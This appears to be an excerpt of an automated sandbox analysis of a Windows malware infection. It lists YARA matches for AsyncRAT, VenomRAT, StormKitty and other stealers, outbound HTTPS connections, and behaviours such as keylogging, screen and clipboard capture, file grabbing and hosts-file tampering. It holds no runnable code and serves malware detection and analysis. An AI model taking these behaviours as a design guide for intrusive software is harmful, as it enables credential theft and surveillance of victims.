Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49938 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED

Contains functionality to capture screen (.Net source)

Source: 4336.tmp.Server.exe.2.dr, DesktopScreenshot.cs	.Net Code: Make
Source: 476D.tmp.Server.exe.2.dr, DesktopScreenshot.cs	.Net Code: Make
Source: 4BC4.tmp.Client.exe.2.dr, Screen.cs	.Net Code: GetScreen

Contains functionality to log keystrokes (.Net Source)

Source: 4336.tmp.Server.exe.2.dr, Keylogger.cs	.Net Code: SetHook
Source: 4336.tmp.Server.exe.2.dr, Keylogger.cs	.Net Code: KeyboardLayout
Source: 476D.tmp.Server.exe.2.dr, Keylogger.cs	.Net Code: SetHook
Source: 476D.tmp.Server.exe.2.dr, Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3CFE98 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0F3CFE98

Source: C:\Windows\explorer.exe	Code function: 2_2_0F3FFFA0 SetClipboardData,		2_2_0F3FFFA0
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3D006C GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_0F3D006C

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3CFE98 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0F3CFE98

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3D8D2C GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,_malloc_dbg,_malloc_dbg,_malloc_dbg,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,memcpy,memcpy,

2_2_0F3D8D2C

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match

File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	File deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	File deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.xlsx
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	File deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KZWFNRXYKI.jpg
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	File deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.pdf
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	File deleted: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

Modifies the hosts file

Source: C:\Windows\System32\relog.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3D9884 memset,memset,OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,??3@YAXPEAX@Z,??3@YAXPEAX@Z,??3@YAXPEAX@Z,CloseHandle,CloseHandle,

2_2_0F3D9884

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\System32\relog.exe

Process information set: 00 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 2.2.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.explorer.exe.8b90000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.f3c0000.3.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 2.0.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.explorer.exe.8b90000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.0.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.c350000.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.explorer.exe.c350000.2.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 2.2.explorer.exe.f3c0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
